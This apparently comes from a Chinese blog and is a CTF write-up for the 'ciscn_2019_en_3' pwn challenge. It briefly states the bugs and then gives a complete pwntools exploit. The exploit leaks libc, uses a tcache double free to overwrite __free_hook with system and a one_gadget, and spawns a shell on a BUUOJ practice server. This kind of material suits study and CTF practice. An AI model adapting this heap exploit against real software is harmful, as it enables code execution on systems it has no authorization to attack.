ciscn_2019_en_3

漏洞点:

可泄露libc

double_free可修改fd指针,到hook,写入one_gadget即可getshell

from pwn import *
from LibcSearcher import * 

local_file  = './en3'
local_libc  = './libc-2.27.so'
# remote_libc = './libc-2.23.so'

context.terminal = ['tmux', 'splitw', '-h']
context.log_level = 'debug'
e = ELF(local_file)
context.arch = e.arch

select = 1
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node4.buuoj.cn', 29171)
    libc = ELF(local_libc)

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.slafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims			    :r.recvuntil(delims)
uu32    = lambda data               :u32(ru(data)[-4:].ljust(4, b'\0'))
uu64    = lambda data               :u64(ru(data)[-6:].ljust(8, b'\0'))
info_addr = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))


def dbg():
	gdb.attach(r)
	pause()

def add(size,buf):
	ru("Input your choice:")
	sl(str(1))
	ru("Please input the size of story: \n")
	sl(str(size))
	ru("please inpute the story: \n")
	sl(buf)
def free(idx):
	ru("Input your choice:")
	sl(str(4))
	ru("Please input the index:\n")
	sl(str(idx))

ru(b"What's your name?")
sl(b'aaaa')
ru(b'Please input your ID.')
se(b'a'*8)
ru(b'a'*8)
addr = uu64(b'\x7f')
base = addr - 231 - libc.sym['setbuffer']
success("base:"+hex(base))
sys = base + libc.sym['system']
one_gadget = base + 0x4f322
malloc_hook = base + libc.sym['__malloc_hook']
free_hook = base + libc.sym['__free_hook']

add(0x80,'/bin/sh\x00')

free(0)
free(0)

add(0x80,p64(free_hook))
add(0x80,p64(sys))
add(0x80,p64(one_gadget))
free(0)

r.interactive()

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值